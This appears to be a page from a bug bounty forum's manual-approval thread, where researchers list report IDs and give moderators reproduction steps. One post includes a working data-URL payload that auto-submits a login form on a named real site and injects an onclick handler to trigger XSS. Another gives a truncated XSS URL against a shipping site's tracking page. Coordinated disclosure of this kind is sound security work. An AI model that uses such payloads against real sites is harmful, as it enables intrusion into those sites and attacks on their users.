Re: Manual Approval Thread
Posted: Tue Mar 30, 2021 6:28 am
approved
Open Bug Bounty Community Forum
Coordinated & Responsible Disclosure
https://www.openbugbounty.org/forum/
Manual Approval Thread
https://www.openbugbounty.org/forum/viewtopic.php?f=10&t=246
Page 449 of 465
Re: Manual Approval Thread
Posted: Tue Mar 30, 2021 2:11 pm
Thanks!
Re: Manual Approval Thread
Posted: Tue Mar 30, 2021 6:34 pm
Hello,
Please approve ID 1970185
You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:
Many thanks,
Please approve ID 1970185
You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:
- Screenshot from 2021-03-30 19-35-33.png (49.97KiB)Viewed 2687 times
Re: Manual Approval Thread
Posted: Wed Mar 31, 2021 9:07 am
1970226 Alt + Shift +X
1970272, 1970286, 1970934 wait for the page to load
1970272, 1970286, 1970934 wait for the page to load
Re: Manual Approval Thread
Posted: Wed Mar 31, 2021 7:33 pm
This has been noted as "Can't Reproduce Vulnerability" but if you do as I've said by going to the url "https://shipafrika.com/track_shipment.p ... BOUNTY%27)+" you will get xss popup. You need to remember the + at the end.JonLaing4 wrote: ↑Tue Mar 30, 2021 6:34 pmHello,
Please approve ID 1970185
You can go to url https://shipafrika.com/track_shipment.p ... BOUNTY%27)+ and you will get xss popup as below:
Screenshot from 2021-03-30 19-35-33.png
Many thanks,
<p>Click Here: <a href="https://shipafrika.com/track_shipment.p ... XSS</a></p>
- Screenshot from 2021-03-31 20-33-56.png (34.99KiB)Viewed 2630 times
And this one is from Firefox:
- Screenshot from 2021-03-31 20-35-05.png (44.1KiB)Viewed 2630 times
Re: Manual Approval Thread
Posted: Thu Apr 01, 2021 8:46 pm
1971939 Chrome, wait for the page to load, if doesn't work try a few more times
Re: Manual Approval Thread
Posted: Sun Apr 04, 2021 6:17 am
Greetings,
Can you check :
1973969
1952022
1951722
Best regards,
Rbcafe
Can you check :
1973969
1952022
1951722
Best regards,
Rbcafe
Re: Manual Approval Thread
Posted: Mon Apr 05, 2021 3:13 pm
Hello,
Please approve ID 1975311
You can copy and paste this into a browser and you will get xss popup when the site loads click on the Password box:
data:text/html,<form method='POST' action='https%3A%2F%2Fwww.awpwriter.org%2Fuser%2Flogin'><input name='email' value=''><input name='password' value='%26%2334%3Bonclick%3Dconfirm%28%29%20'><input name='redirect_url' value='https%3A%2F%2Fwww.awpwriter.org%2F'></form><script>document.forms[0].submit()</script>
Please approve ID 1975311
You can copy and paste this into a browser and you will get xss popup when the site loads click on the Password box:
data:text/html,<form method='POST' action='https%3A%2F%2Fwww.awpwriter.org%2Fuser%2Flogin'><input name='email' value=''><input name='password' value='%26%2334%3Bonclick%3Dconfirm%28%29%20'><input name='redirect_url' value='https%3A%2F%2Fwww.awpwriter.org%2F'></form><script>document.forms[0].submit()</script>
- Screenshot from 2021-04-05 16-10-55.png (67.4KiB)Viewed 2466 times
Re: Manual Approval Thread
Posted: Tue Apr 06, 2021 7:07 am
Greetings,
Can you check :
1973971
1973969
1973968
1973967
Best regards,
Rbcafe
Can you check :
1973971
1973969
1973968
1973967
Best regards,
Rbcafe
Re: Manual Approval Thread
Posted: Tue Apr 06, 2021 12:05 pm
Also 1972194, 1972206, 1972431, 1976833. Some of them seem patched already though.